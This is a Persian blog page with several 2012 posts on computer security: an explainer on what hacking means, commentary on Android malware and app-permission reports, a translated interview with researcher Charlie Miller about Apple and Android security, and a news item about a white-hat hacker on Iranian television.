هر نوع نفوذ که توسط هکر در یک سیستم امینتی شبکه و کامپیوتری انجام گیرید به نوعی هک گفته می شود واژه‌ی هک به معنی نفوذ به سیستم‌های کامپیوتری و دسترسی غیرمجاز به سیستم‌ می‌باشد. به شخصی که این کار را انجام می‌دهد هکر گفته می‌شود. شاید در فیلم‌های سینمایی دیده باشید که نفوذ به یک سیستم کاری جذاب و همراه با عباراتی مانند Well Come. نشان داده می‌شود اما در واقع عملیات هک چنین نیست. نفوذ به یک سیستم کامپیوتری شامل عملیاتی طولانی و خسته‌کننده است و البته تجربه بالایی نیاز دارد.
● هکر hacker کیست ؟
مفهوم هک همپای پیشرفت کامپیوتر همواره تغییر کرده است. در ابتدا مفهوم هک استفاده از ابزارهای الکترونیکی و ارتباط نظیر تلفن جهت استفاده رایگان از آنها بود ک که بعدها توسط کارشناسان نرم افزاری جهت بدست آوردن کد و اطلاعات برنامه ها تغییر نمود و در حال حاضر هک به دستیابی غیر مجاز به اطلاعات یک کامپیوتر یا شبکه گفته می شود. با توجه به اینکه این کار غیر قانونی و گاهاً مخرب است ، هکرها به عنوان کاربران خطرناک و حتی پس از حملات ۱۱ سپتامبر بعنوان تروریست کامپیوتری مشهور شده اند.
در گذشته، تصور عمومی بر آن بود که هکرها بی آنکه قابل ردیابی باشند اطلاعات را به سرقت می بردند، این در حالی است که اگر از کارشناسان امنیت کامپیوتر در این موارد استفاده شود، می توانند نحوه هک شدن و نیز حتی فرد هکر را نیز شناسایی کنند.
هک میتواند جنبه شخصی یا حرفه ای داشته باشد، به عبارت دیگر، هکرها می توانند کلمات عبور یا اطلاعات شخصی یا شرکتی را به سرقت ببرند و یا در سطح بالاتری برای امنیت ملی خطراتی ایجاد کنند، مانند دخالت در امور ارتباطی و مالی و ... .
برخلاف تصوری که مردم از هکرها به عنوان افراد منزوی و ناراحت دارند، بسیاری از هکرها افراد باهوش و خلاق هستند و صرفاً بدلیل اغنای حس کار گروهی یا احساس قدرت اقدام به این کار می نمایند
tkh بازدید : 133 پنجشنبه 25 آبان 1391 نظرات (0)

درست یک روز پس از اعلام گزارش امنیت موبایل که بر این نکته تاکید داشت بدافزارهای سیستم‌عامل اندرویدحدود 580 درصد افزایش یافته اند، گزارش دیگری نشان می دهد که این بدافزارها نگران کننده تر از نتیجه هایپیشین هستند.

در گزارش پیشین آمده که یافته های جدید نشان می دهد بدافزارهای سیستم‌عامل اندروید از سپتامبر سال 2011میلادی تا سپتامبر سال 2012 میلادی حدود 580 درصد رشد داشته اند. از این گذشته، بیش از 175 میلیون دانلوداپلیکیشن های بسیار خطرناک در 500 اپلیکیشن برتر گوگل پلی یافت شده است. 

در نگاه نخست، این موضوع بسیار خطرناک به نظر می رسد اما بگذارید جزئیات این گزارش را نیز برررسی کنیم.این ارقام از گزارش شرکت امنیتی TrustGo گرفته شده اند. این شرکت آمریکایی در زمینه آنتی ویروس فعال است وحدود یک و نیم میلیون دلار سرمایه دارد. در وهله اول باید گفت، 580 درصد در واقع یک گزارش آماری است. بله،تعداد اپلیکیشن های اندروید در حال افزایش هستند. بیشتر کاربران اندروید برنامه های خود را از گوگل پلی دانلودمی کنند. ارقام حاصله شرکت TrustGo از اسکن 1.7 میلیون اپلیکیشن که در 175 مارکت مختلف در سراسر جهانوجود داشته اند، جمع آوری شده است. به علاوه، تعداد واقعی اعداد نیز به این صورت است که در سپتامبر سالگذشته 4951 بدافزار و امسال 28707 بدافزار پیدا شده است. 

همیشه درصدهای آماری هنگامی کاربردی هستند که ارقام با هم قابل مقایسه باشند. اندروید یک پلتفورم جدیداست بنابراین افزایش سرسام آور تعداد بدافزارها امری بدیهی است، زیرا تعداد اپلیکیشن ها نیز در حال افزایشاست. در اینجا آمار جدیدی پدیدار می شوند: 1.69 درصد از همه اپلیکیشن های اندروید که بیشتر آنها در گوگلپلی وجود ندارند، مخرب هستند. 

نکته ای که باید روی آن تاکید کرد این است که بیشتر اپلیکیشن های خطرناک در گوگل پلی موجود نیستند وبنابراین بیشتر کاربران آنها را دانلود و نصب نمی کنند. TrustGo، اپلیکیشن های مخرب را از انواع بسیار خطرناکجدا کرده است. انواع مخرب به شما و موبایل تان صدمه وارد می کنند، اما انواع بسیار خطرناک اطلاعات را میدزدند، به امنیت لطمه می زنند، وب‌گردی کاربر را ردیابی می کنند، نشانی جغرافیایی کاربر را برای هکر ارسال میکنند و ... .

گزارش امنیتی جدید 14 صفحه ای است و شرکت Bit9 آن را با عنوان:«توقف گوگل پلی: بیش از یکصدهزاراپلیکیشن اندروید ممکن است مشکل امنیتی داشته باشند» بیرون داده است. مبحث های اصلی این گزارش دررابطه با این موضوع هستند که 72 درصد از همه برنامه های اندروید (بیش از 290 هزار) دست‌کم به یک اجازه نامهخطرناک دسترسی دارند. بقیه گزارش نیز روی این مساله که چرا شرکت ها باید نگران امنیت دستگاه های خودباشند متمرکز است. 

شرکت Bit9 بیش از 400 هزار اپلیکیشن را در گوگل پلی مورد ارزیابی قرار داده است و نتیجه زیر را کسب کردهاست:

  • 72 درصد از تمام اپلیکیشن های اندروید یعنی حدود 290 هزار برنامه، دست‌کم به یک اجازه نامه بسیار خطرناک دسترسی دارند.
  • 21 درصد (بیش از 86 هزار برنامه ) به بیش از 5 مورد پرمیشن خطرناک یا بیشتر دسترسی دارند.
  • 2 درصد یعنی بیش از 8 هزار اپلیکیشن به 10 مورد اجازه نامه یا بیشتر دسترسی دارند که خطرناک هستند.

البته این نکته نیز در اینجا مطرح است که این ارقام کوچک تر از آن هستند که باید باشند. بر اساس آخرین آمار،گوگل پلی بیش از 700 هزار اپلیکیشن دارد. بنابراین، 72 درصد از کل آنها 290 هزار اپلیکیشن نمی شود. بقیه ارقامنیز به همین ترتیب. این معلوم می کند که Bit9 فقط 400 هزار اپلیکیشن را مورد ارزیابی قرار داده است.

اگر همه برنامه را بررسی کنید، نتیجه تا حدی با این ارقام متفاوت خواهد بود و این در حالی است که Bit9 بیش ازنیمی از اپلیکیشن های موجود را ارزیابی کرده است، نه همه آنها را. این تلاش به کار بیشتری نیاز داشت تا نتیجهدقیق تری را اعلام کند. 

شاید راه دیگری نیز وجود داشت که با کار کمتر نتیجه دقیق تری حاصل شود. بسیاری از اپلیکیشن ها هرگز دانلودنمی شوند، بنابراین روی هیچ دستگاهی نیز نصب نمی شوند. فکر می کنید چه تعداد از 8 هزار اپلیکیشن بالادانلود، نصب و استفاده می شوند؟ بیشتر کاربران اندروید فقط برنامه های رایج آن را دانلود و استفاده می کنند.بنابراین، اگر Bit9 اپلیکیشن های رایج اندروید (مثلا 100 هزار برنامه) را ارزیابی می کرد، یافته های آنها کاربردی ترمی شد. 

هزاران اپلیکیشن اندروید در اینترنت و حتی گوگل پلی وجود دارند که به هر دلیلی به بیش از یک اجازه نامه نیازدارند. این برای کاربران بسیار مهم است که برنامه هایی را دانلود و نصب کنند که واقعا همانی هستند که ادعا میکنند. منظور از این حرف این است که نمی توان به راحتی تعداد برنامه های مشکوک اندروید را مشخص کرد. 

Bit9 در مورد نتیجه اعلام شده خود اینگونه می گوید:

«ما برای تعیین میزان خطر آن را با میزان نفوذ امنیتی یا قابلیت دسترسی (به طور مثال، قابلیت پاک کردن دستگاهها یا تغییر تنظیمات سیستم)ارتباط دادیم. سطح خطر، اگرچه هیچ گونه فعالیت مخربی را در مورد اپلیکیشن هایمشخص شده نشان نداد، اما این قابلیت را داشت که اگر در معرض خطر بود به اپلیکیشن آسیب برساند. بسیاریاز اپلیکیشن ها نیز سطح دسترسی هایی را تقاضا می کنند که به قابلیت های آنها ارتباطی ندارد. نکته قابل توجهدیگر این است که تعداد قابل توجهی از برنامه ها عنوان «شناخته شده» دارند. به طور مثال، از 115 اپلیکیشنی کهدو کلمه Angry و Birds را در عنوان خود دارند، فقط 4 اپلیکیشن هستند که به کمپانی Rovio Mobile (تولیدکنندهرسمی اپلیکیشن  Angry Birds) تعلق دارند. در میان آنها، Angry Birds Live Wallpaper دو برابر بیشتر از برنامهاصلی بازی پرندگان خشمگین تقاضای دسترسی به سیستم کاربر را دارد. به طور مثال، این برنامه تقاضایدسترسی به اطلاعات جی‌پی‌اس را دارد که هیچ ارتباطی به کاربردش ندارد.»

این بسیار مهم است که بدانید ما در مورد بدافزارها صحبت نمی کنیم بلکه صحبت ما در مورد سطح دسترسیهایی است که به اپلیکیشن های مختلف می دهید که در واقع نیازی به آنها نیست. همیشه به این توجه داشتهباشید، برنامه ای که قصد نصب آن را دارید چه دسترسی‌ای از شما می خواهد. بسیاری از آنها بیش از آنچه کهنیاز داشته باشند تقاضا می کنند و هوشیاری شما در اینجا برای امنیتتان بسیار اهمیت دارد.

یافته های جدید نشان می دهد بدافزارهای سیستم‌عامل اندروید از سپتامبر سال 2011 میلادی تا سپتامبر سال 2012 میلادی حدود 580 درصد رشد داشته اند. از این گذشته، بیش از 175 میلیون دانلود اپلیکیشن های بسیار خطرناک در 500 اپلیکیشن برتر گوگل پلی یافت شده است. گزارش دیگری می گوید 72 درصد از برنامه های اندروید (بیش از 290 هزار) دست‌کم به یک اجازه نامه خطرناک دسترسی (permission) دارند.
tkh بازدید : 101 سه شنبه 23 آبان 1391 نظرات (0)

 

t1larg-charlie-miller-cnn.jpeg

این مطلب، مصاحبه کاملی است که وب سایت انگجت با «دکتر چارلی میلر» انجام دادهاست. دکتر میلر فارغ التحصیل رشته ریاضی از دانشگاه نوتردام است. او حدود 5 سال درآژانس امنیت ملی (NSA) به شغل رمزنگاری مشغول بود. پس از ورود به دنیایافسارگسیخته و بسیار هیجان انگیز تحلیل امنیت، میلر نخستین فردی بود که برای نخستینبار توانست باگ هایی در باتری مک بوک ایر و باگ های متعددی در سیستم عامل مک اواس ایکس و مرورگر سافاری پیدا کند. او با این کار، هزاران دلار پول به جیب خود سرازیر کرد.

در قسمت اول این مصاحبه در خصوص دلایل گرایش دکتر میلر به مسایل امنیتی و هکر شدن وی صحبت کردیم و از وی درباره امنیت دستگاه های اپل و چرایی علاقه او به این ابزارها پرسیدیم. حال در بخش پایانی بیشتر با نظریات این هکر-محقق در خصوص مسائل امنیتی و امنیت سیستم عامل های موبایل آشنا می شویم.

 

چیزی که کاملا مشخص و واضح است، نقص و معایبی است که iOS اپل داردآیا شما فکر می کنید سیستم عاملاندروید نیز این اشکالات را دارد؟ یا، سیستم عامل گوگل آسیب پذیر تر از iOS است؟

من iOS را همه جانبه مورد تحقیق و کنکاش قرار داده امبا آن کار کرده ام و سوراخ های امنیتی آن را به خوبی می دانم. iOS واندروید دو فلسفه جدا از هم دارنداپلی ها روش متفاوتی را برای حفظ امنیت محصولاتشان در پیش گرفته اند. iOS به هیچ عنوانبه کاربر اجازه نصب نرم افزارهای جانبی و در نتیجه بدافزارها را نمی دهداما در اندروید می توانید هر برنامه و نرم افزاری را میخواهید روی گوشی نصب و آن را اجرا کنیدشاید این مساله به طور کلی جالب باشد، اما از نظر امنیتی خطرناک استزیرا کاربرمی تواند بدون آگاهی، یک بدافزار را دانلود و آن را روی گوشی نصب و اجرا کند.

روشی که اندروید در پیش گرفته، راهی است که ویندوز سال هاست در آن مسیر قرار دارداین خود کاربر است که باید حواسشرا جمع کند تا مورد حمله هکرها قرار نگیرداما در محصولات اپل، این مساله کاملا برعکس استاین اپل است که کنترل همه چیزرا به دست گرفته استآنها از همان ابتدا اجازه نصب هیچ گونه نرم افزار جانبی را به کاربر نمی دهند و فقط باید نرم افزارهایموجود در فروشگاه اپل را خریداری، دانلود و نصب کنیداین مساله از نظر امنیتی بسیار درست و کارآمد استزیرا همه محصولاتموجود در فروشگاه اپل، از غربال امنیتی عبور کرده اند و کاربر صددرصد مطئن است که نرم افزار موجود، بدافزار نیستتنها ایراد اینروند، آن است که نمی توانید برنامه های جانبی مورد علاقه خود را نصب و استفاده کنیدهمان طور که می دانید، تعدادبدافزارهایی که به راحتی به سیستم عامل اندروید نفوذ می کنند کم نیستنداما iOS این مشکلات را ندارد.

 

به نظر شما جیلبرک کردن دستگاه هایی مبتنی بر iOS یا روت کردن اندرویدی ها کار درستی است یا تصور میکنید معایب این کار بیشتر از مزیت های آن است؟

بدون شک، با جیلبرک کردن دستگاه های مبتنی بر iOS، امنیت اطلاعات گوشی یا تبلت خود را مورد تهدید قرار می دهیدشما بااین کار کدهای امنیتی را از بین می برید و به همین دلیل است که می توانید همه برنامه های موردعلاقه تان را از فروشگاهاینترنتی دانلود و روی گوشی نصب کنیدوقتی هم که می توانید هر نرم افزاری را نصب کنید، یعنی می توانید بدون اطلاع بدافزارهارا نیز به گوشی خود راه بدهید و امنیت اطلاعات خود را به خطر بیندازیداین مواردی است که همه آن را می داننداما حفاظت دراینجا معانی گسترده تری داردشکستن قفل های امنیتی آیفون یا آی پد، کدهای بیشتر به سیستم اضافه می کند و به موجبآن، همه برنامه ها در ریشه سیستم عامل اجرا می شودبه عنوان مثال، ممکن است سرور SSH که به عنوان root اجرا میشودیا نرم افزارهای دیگری که نصب می کنید نیز به صورت ریشه ای اجرا می شوندمنظور از این نوع root این است که خواندن ونوشتن داده ها سطح دسترسی بالاتری در سیستم انجام می شود که یک سیستم عامل iOS دست نخورده هیچگاه چنین اجازه ای را نمی دهد.

به این ترتیب، شما می توانید همه برنامه ها را روی گوشی خود اجرا کنیدجیلبرک کردن باعث خاموش شدن کدهای حفاظتیحافظه دستگاه می شوندبه همین دلیل، نفوذ و هک کردن چنین گوشی هایی بسیار ساده استزیرا هیچ گونه کنترل امنیتیندارندگوشی های جیلبرک شده به صورت خودکار بسیاری از کدهای گوشی را غیرفعال می کنندبخش اعظم این کدها راکدهای امنیتی تشکیل داده اندبنابراین به راحتی می توان به آنها نفوذ کرد.

اینکه جیلبرک کردن کار درستی است و ارزشش را دارد یا خیر، بستگی به خود کاربرها دارداگر نرم افزاری هست که آنها واقعاتمایل به داشتنش دارند، شاید پذیرفتن ریسک این خطرات نیز برایشان آسان استاما من به شخصه به دلیل تحقیقاتی که انجاممی دهم، گوشی خود را جیل برک می کنم.

 

از نظر امنیت کلی دستگاه ها، از مک گرفته تا دسک تاپ ها، به نظر شما کدام شرکت بهترین امنیت را در سیستمعامل خود اجرا می کند؟ آیا به نظر شما webOS در مسیر امنیتی درستی قرار دارد؟

سوال خوبی استدر گذشته، تفاوت های بسیاری بین سیستم عامل ها وجود داشتاما امروزه، تقریبا همه آنها مشابه یکدیگرعمل می کنندتقریبا نمی توان گفت کدام شرکت بهتر از آن یکی استهمه آنها خوب هستندبه هیج وجه دوست ندارم بگویمیک سیستم عامل بهتر یا بدتر از دیگری استهمه آنها واقعا از نظر امنیتی مشابه هم عمل می کنند و تفاوت های بسیار کمیبین آنها وجود دارد.

 

یک سوال سختآیا فکر می کنید حذف شدن شما توسط اپل از شبکه برنامه نویس های فروشگاه اینترنتی اپل،کار بیرحمانه و افراطی بوده است؟ اگر هنوز برای آنها کار می کردید، دوست داشتید چه کاری انجام دهید؟

اینکه آیا این کار بی رحمانه یا افراطی بوده است، من نظری ندارممن قوانین سایت آنها را شکسته بودم و اپل به طور قانونی اینحق را داشت که اکانت مرا حذف کنداین مساله برای من چندان هم مهم نبودمن واقعا اهمیتی به این اتفاق نمی دهم. چیزیکه برای من خیلی اهمیت داشت این بود تا مردم از این اشکالات آگاه شوندبرای من مهم بود که کاربران اپل مورد حمله هکرها یابدافزارها قرار نگیرنداین کار باعث شد امنیت این دستگاه ها بیشتر شودبه طوریکه که iOS دارها هرگز به بدافزار آلوده نمیشوند.

صرف نظر از نتیجه کار، همه فکر من این بود که کاربرها باید در مورد امنیت وسایلشان بدانندبنابراین تصمیم به انجام این کار گرفتم.هنوز کاربرها نرم افزارهای بسیاری از این فروشگاه دانلود می کنند و این مساله واقعا عالی استبسیار خوب است که آنهاهمچنان تمایل به دانلود نرم افزارهای من دارندمن هیچ گاه به اینکه اپل کوته نظری کرده و اکانت مرا حذف کرده است، اهمیتینمی دهم. زیرا قصد من اطلاع رسانی به مردم و کاربران محصولات اپل بود و به هدف خود نیز رسیدماز اینکه دیگر برنامه نویسفروشگاه اپل نیستم، ناراحت نیستم.

 

آیا فکر می کنید می توانید اکانت خود را بازگردانید؟

(با خندهنمی دانم چگونه می توان این کار را کردشاید بتوان این کار را کرداما در واقع نظری در مورد بازگرداندن اکانت خود ندارم.

 

مثلا شاید با یک نامه عذرخواهی بتوانید اکانت تان را دوباره فعال کنید؟

من هیچ دلیلی برای عذرخواهی کردن نمی بینمکاری که من انجام داده ام، چیزی نبوده که نیاز به عذرخواهی داشته باشداگرباز حق انتخاب داشتم، دوباره همین کار را انجام می دادمزیرا همان طور که بارها تکرار کردم، هدف من از این کار این بوده کهمردم بیشتر در مورد امنیت دستگاه هایی بدانند که روزانه از آنها استفاده می کننداین مساله بسیار ارزشمندتر از اکانت 99 دلاریمن است.

 

در حال حاضر، نظر شما در مورد اپل و امنیت محصولاتش چیست؟

اپل نسبت به سال های گذشته، از نظر امنیتی بسیار پیشرفت کرده استاگر به گذشته آیفون که در سال 2007 میلادی براینخستین بار معرفی و عرضه شد نگاه کنید، می بینید که امنیت آن در حد فاجعه بوده استمرورگر وب به صورت ریشه ای اجرا میشدهیچ گونه سندباکسینگی وجود نداشتآیفون اولیه، از وجود کدی برای ورود یا هر مورد امنیتی دیگری بی نصیب بوداگر آنآیفون را با آیفون های کنونی مقایسه کنید، موبایل های الان واقعا امن هستنددر مورد خود اپل و افرادی که در آن مشغول به کارهستند نمی توانم نظری بدهمجامعه کاری اپل یک جامعه کاملا بسته و محدود استمن می دانم که آنها افراد باهوشیاستخدام می کنند و خیلی راحت نیز آنها را با حقوق کامل اخراج می کنندمتاسفانه، این رویداد آخر کمی دیدگاه مرا نسبت به اپلتغییر داده است.

 

در آخر، چه صحبتی برای آن دسته از افرادی دارید که تمایل دارند قدم در راه شما بگذارند و یک تحلیل گر امنیتبشوند؟

من این سوال را بارها شنیده امبسیار سخت است که کسی بخواهد پا در جای پای من بگذارد. زیرا هر کسی نمی تواند بهآژانس امنیت ملی راه پیدا کند و تحت تعلیمات و آزمایش های آنها قرار بگیرداما از طرفی هم، باید به علاقه مندان این مسیر بگویمکه می توانند با مطالعه و تحقیقات مستمر و دایمی، برنامه ها، نرم افزارها و وسایل را مورد آزمایش قرار دهند و حفره های امنیتیآنها را – اگر دارند – پیدا کنند.

نرم افزارهایی که من نوشته ام را دانلود کنندببینند که چگونه کار می کنندنقص و اشکال آن کجاست؟ چگونه می توان از آناستفاده کردامنیت کامپیوتر علمی است که به تمرین بسیار نیاز داردباید فرضیه های خود را اجرا کنیداین علم چیزی نیست کهدر دانشگاه ها بتوان آن را یاد گرفتبلکه شدیدا بر تجربه و تمرین استوار استباید کدهای مخرب را بشناسید، راه های نفوذ رابلد باشیدزمانی که من در NSA تحت آموزش بودم، کار خاصی انجام نمی دادم فقط در حال آموختن چیزهایی بودم که میتوانستم بعد از پایان دوره ام، آنها را انجام دهدبه نظر من بهترین راه برای تبدیل شدن به یک تحلیل گر امنیتی بسیار خوب، رفتن بهعمق کار استشما باید اول یک هکر باشید تا بتوانید راه های نفوذ آنها را پیدا و تحلیل کنید.

tkh بازدید : 106 سه شنبه 23 آبان 1391 نظرات (0)

 

1_0.jpg

این مطلب، مصاحبه کاملی است که وب سایت انگجت با «دکتر چارلی میلر» انجام دادهاستدکتر میلر فارغ التحصیل رشته ریاضی از دانشگاه نوتردام استاو حدود 5 سال درآژانس امنیت ملی (NSA) به شغل رمزنگاری مشغول بودپس از ورود به دنیایافسارگسیخته و بسیار هیجان انگیز تحلیل امنیت، میلر نخستین فردی بود که برای نخستینبار توانست باگ هایی در باتری مک بوک ایر و باگ های متعددی در سیستم عامل مک اواس ایکس و مرورگر سافاری پیدا کنداو با این کار، هزاران دلار پول به جیب خود سرازیر کرد.دکتر میلر که شاید او را به عنوان هکر یا محقق امنیتی بشناسید، با هک کردن باتری لپ تاپهای اپل، در مسابقه کنفرانس امنیتی هکرهای کلاه سیاه برنده و به این ترتیب مشهورشد

نگهبانحفره امنیتی در لپ تاپ های اپل، هک باتری می تواند باعث نابودی آنها شود

 

کمتر از دو ماه پیش، دکتر میلر با قطعیت تمام و با دلیل علمی اعلام کرد، در سیستم عاملiOS نیز حفره امنیتی وجود داردالبته این بیانیه همان و اخراج شدن او از شبکه برنامه نویسهای فروشگاه اپل نیز همانااین کار دکتر میلر به بیرون رانده شدن از جمع برنامه نویس هایاپل و گرفتن لقب دیوانه منجر شد

اکنون در این مطلب، پرسش و پاسخ های انگجت و دکتر چارلی میلر در مورد اپل، iOS،امنیت، فناوری، سندباکسینگ و مزایا و معایب امنیت مدرن و همچنین فراز و نشیب فعالیتهای فن شناسان و تکنولوگ ها را مطالعه می کنیم

 

  • آن طور که از پروفایل شخصی شما مشخص است، مدرک دکترا در رشته ریاضیاز دانشگاه نوتردام داریدبعد از فارغ التحصیلی نیز به مدت 5 سال در آژانسامنیت ملی (NSA) که شرکتی دولتی است مشغول به کار بوده ایدچه چیزیشما را به سمت امنیت نرم افزار و دست آخر هکر شدن کشاند؟

خبکار من در آژانس امنیت ملی، رمزنگاری (cryptography) بودرشته تحصیلی من نیزریاضی استاین دومساله کاملا در راستای یکدیگر هستند و تطابق کامل دارندالبته ناگفتهنماند، هنگامی که وارد آژانس امنیت ملی شدم چندان شغلم را دوست نداشتماما یکی ازمزیت های این آژانس این است که کارمندان را طوری آموزش می دهد که بر اساس نیازهایآنها کار کنند و به تدریج این تمایل را در خودشان نیز به وجود بیاورندبنابراین، در ادامه کار ازاین روند خوشم آمد و به نظر کار جالبی بودآنها نیز به خوبی مرا در این زمینه آموزش دادند.در آن 5 سال، علاوه بر آنکه برای آژانس امنیت ملی کار می کردم، تحت آموزش های کاملینیز قرار داشتمبنابراین، بعد از خروج از آنجا شغلی مرتبط با امنیت نرم افزارها پیدا کردم.

 

  • نخستین بار، چه چیزی باعث شد تا در مسابقه PWN 2 OWN در سال ۲۰۰۸میلادی شرکت و مک بوک ایر اپل را هک کنید؟

باور کنید یا نه، در آن زمان هیچ کس قبول نداشت که مک های اپل آسیب پذیر هستند.بنابراین، به دنبال راهی بودم تا به مردم بگویم: «آی مردماینها فقط یک مشت کامپیوترهستندآنها باگ دارند، آسیب پذیر هستند، کدهای مخرب دارند و می توانند از شما بهرهکشی کنند.» اما مردم این موارد را نه می دیدند و نه قبول داشتندمن بارها به این مطلباشاره کرده بودم و هیچ کس حرف مرا قبول نمی کرداصلی ترین مساله ای که مرامشتاقانه به سمت این کار می کشید، این بود تا به مردم بفهمانم مک بوک های اپل، از نظرامنیتی بسیار ضعیف تر از آن چیزی هستند که گفته می شودحتی در مقایسه با ویندوزمایکروسافت نیز باگ بیشتری داردبه همین دلایل بود که در این مسابقه شرکت کردمبرایاینکه حرف خود را به اثبات برسانم، سیستم امنیت این محصولات را هک کردم و دستگاه هااز کار افتادندمردم این مساله را باور نمی کردندحتی بعد از این نمایش نیز مردم ادعا میکردند که من دسترسی به اطلاعات و رمزهای کامپیوترهای اپل داشته اماما واقعا این طورنبودهمین مساله دوباره مرا تحریک کرد تا سال بعد نیز، یعنی سال ۲۰۰۹ میلادی دوباره دراین مسابقه شرکت کنم.

  • این آسیب پذیری را دوباره در چه محصول دیگری پیدا کرده بودید؟

همه باگ ها در مرورگر اپل، یعنی سافاری وجود داشتندنخستین بار این باگ، در اصل یکدسته باگ بوداما در سال بعد - ۲۰۰۹  میلادی -   فقط یک باگ در فونت ها وجود داشتکه از طریق مرورگر سافاری قابل دسترسی بودخوبی مسابقه دوم این بود که مردم بهتدریج باور می کردند که محصولات اپل نیز از نظر امنیتی قابل هک شدن و نفوذ هستند.همچنین باور کردند، من حقیقت را می گویم و آنها نیز همچون دیگر محصولات الکترونیکآسیب پذیر هستند.

  • بیشتر مردم اعتقاد دارند همه فعالیت های شما فقط روی محصولات اپل استواراستآیا انتخاب این برند دلیل خاصی دارد؟ آیا فلسفه یا رسالت خاصی از اینکار دارید یا فقط برای جمع آوری اطلاعات بیشتر به این برند خاص توجه ویژهنشان می دهید؟

شاید بتوانم بگویم، اصلی ترین دلیل من برای انتخاب محصولات اپل این بوده است که بیشتروسایل الکترونیک من همچون گوشی موبایل یا لپ تاپم، اپل هستندوقتی من به طور مداماز مک بوک یا آیفون استفاده می کنم، بنابراین چندان هم عجیب نیست که بخواهم باگ اینمحصولات را پیدا کنموقتی از یک محصول استفاده می کنید، دوست دارید بیشترین امنیت راداشته باشدبنابراین کشف و برطرف  کردن باگ این محصولات در درجه نخست، به نفع خودمن بودالبته، مساله دیگری نیز در این انتخاب نقش داشتدر سال ۲۰۰۷ میلادی که منبرای نخستین بار به دنبال سوراخ های امنیتی محصولات اپل رفتم، پیدا کردن باگ ها و نفوذبه سیستم آنها بسیار آسان تر بوددر آن زمان، از آنجا که همه تصور می کردند اینمحصولات هیچ گونه راه نفوذی ندارند و امنییتشان کامل است، هک کردنشان راحت تر بود.زیرا هیچ گونه نرم افزار امنیتی خاصی برای آنها طراحی و تولید نشده بودباید بدانید، در آنزمان نفوذ به سیستم عامل مک بوک، بسیار آسان تر از هک کردن ویندوز مایکروسافت بود.من در آن زمان سه یا چهار کد مخرب برای OS X می نوشتم، در حالی که برای ویندوز فقطیک کد می توانستم بنویسم. اما در حال حاضر این مساله تغییر کرده است.  هک کردن اینسیستم ها چندان هم کار ساده ای نیست

زمانی که شما نخستین بار تصمیم گرفتید آسیب پذیری محصولات اپل را از نظرامنیتی امتحان کنید، در مقایسه با سیستم عامل های ویندوز،به نظرتان OS Xچقدر باز و آسیب پذیر بود؟

تقریبا می توانم بگویم زیادوقتی به سیستم عاملی همچون ویستا یا ویندوز سرور 2003نگاه می کنید، آنها در آن زمان فناوری هایی برای غیر قابل نفوذ بودنشان داشتنداماسیستم عامل او اس ایکس اپل، در آن زمان نسخه ای همچون Lion برای مقابله با کدهایمخرب نداشتدر سال ۲۰۰۸ میلادی که من برای نخستین بار در مسابقه هکرها توانستمبه سیستم عامل مک بوک نفود کنم، اپل هیچ گونه بسته امنیت اطلاعات (DEP) برایمحصولاتش بیرون نداده بودبنابراین، به راحتی می شد سوراخ های امنیتی را پیدا کرددرآن زمان می شد برای حافظه و برنامه اجرایی کامپیوتر کدهای مخرب نوشت و بدون هیچگونه مانعی به داخل آنها نفوذ کرداما وقتی در سال ۲۰۰۹ از همان کدها برای نفوذ بهسیستم استفاده کردم، موفق به ورود نشدمو مساله خوشحال کننده این است که Lionموجود در محصولات اپل، کار نفوذ به داخل سیستم عامل را همچون ویندوز 7 بسیار دشوارکرده است

بر اساس آن چیزی که نسخه های 10.6  و  10.7  مک او اس ایکس  دیده اید،اپل چه کارهای امنیتی برای این سیستم عامل انجام داده است؟

آنها بسیاری از باگ ها و سوراخ های امنیتی این سیستم عامل را برطرف کرده انداما اینکهبگوییم دقیقا چه کارهایی انجام داده و چه پروسه هایی پشت سر نهاده اند، چندان کارساده ای نیستبه ویژه اینکه بخواهیم این روند را با دیگر سیستم عامل ها نیز مقایسهکنیماما چیزی که می توان به خوبی اشاره کرد، همان موردی است که در بالا نیز گفتم.اپل، فناوری ضد نفوذ بسیار کارآمدی را برای محصولاتش تولید و آنها را به آن مجهز کردهاست. ASLR که سازمان دهنده حافظه و DEP که جداساز کدها از دیتاها است، مواردامنیتی قابل توجهی هستند که محصولات جدید اپل از آنها بهره می برندمحصولات اپل، بهطور پیش فرض با امنیت بالا ساخته و فروخته می شوند. Lion نیز با قابلیت سندباکسینگ(Sandbox) برای سافاری معرفی شده استبا وجود این افزارهای جدید، نفوذ به سیستمعامل و مرورگر اپل بسیار دشوارتر از پیش است.

tkh بازدید : 100 سه شنبه 23 آبان 1391 نظرات (0)

ایتنا - 

پایگاه اطلاع رسانی تبیان نیوز : برای نخستین بار یک هکر کلاه سفید با حضور در یک برنامه زنده تلوزیونی، امنیت سایت‌های اینترنتی را به چالش کشید. به نوشته نود آی سی تی در برنامه ۲ نیم ساعت شبکه خبر، این کارشناس امنیت در کنار مهمانان برنامه به اعلام نظرات و پیشنهادهای خود در خصوص امنیت فضای مجازی کشور پرداخت. این هکر کلاه سفید با اشاره به وب سایت مهمان برنامه که خود در خصوص امنیت سایت‌ها اعلام نظر می‌کرد، آن را دارای نقاط ضعف فراوانی دانست که نیازمند توجه بیشتر برای امنیت است. این برنامه یک ساعته که غالبا موضوعات سیاسی و اقتصادی را پیگیری می‌کند، پنجشنبه شب موضوع امنیت در فناوری اطلاعات را با حضور مهندس ریاضی، معاون سابق فناوری اطلاعات وزارت ارتباطات و فناوری اطلاعات و مهندس افشار، عضو دبیرخانه شواری عالی اطلاع رسانی بررسی کرد که در بخش دوم برنامه یک هکر کلاه سفید به صورت تلفنی در برنامه حضور یافت در بخش اول صحبت خود، وب سایت یکی از مهمانان را مورد نقد جدی قرار داد. وی در ادامه با اشاره به ارزش‌های شکل گرفته در دنیای سایبری، بر ضرورت حفاظت و برنامه‌ریزی در جهت صیانت از آن اشاره کرد. کارشناس امنیت سایبری با تقسیم فضای امنیت الکترونیک به ۳ گروه حاکمیتی، بنگاه‌ها و مردم، درک فضای جدید و برنامه‌ریزی برای ایجاد امنیت به عنوان زیرساخت حضور در این فضای جدید تاکید کرد. این هکر کلاه سفید خواستار توجه جدی مسئولان و مدیران IT کشور به دام‌های پیش رو به ویژه در بخش نرم افزارهای رایگان شد. وی نرم افزارهایی مانند واژه نامه Babylon را یک دام الکترونیک دانست که توانایی جاسوسی از سیستم‌های رایانه‌ای را دارد و متاسفانه در بسیاری از ادارات دولتی نیز استفاده می‌شود. برنامه دو نیم ساعت از برنامه‌های روزانه شبکه خبر است که از ساعت ۸:۳۰ تا ۹:۳۰ به بررسی موضوعات مختلف سیاسی و اقتصادی می‌پردازد.

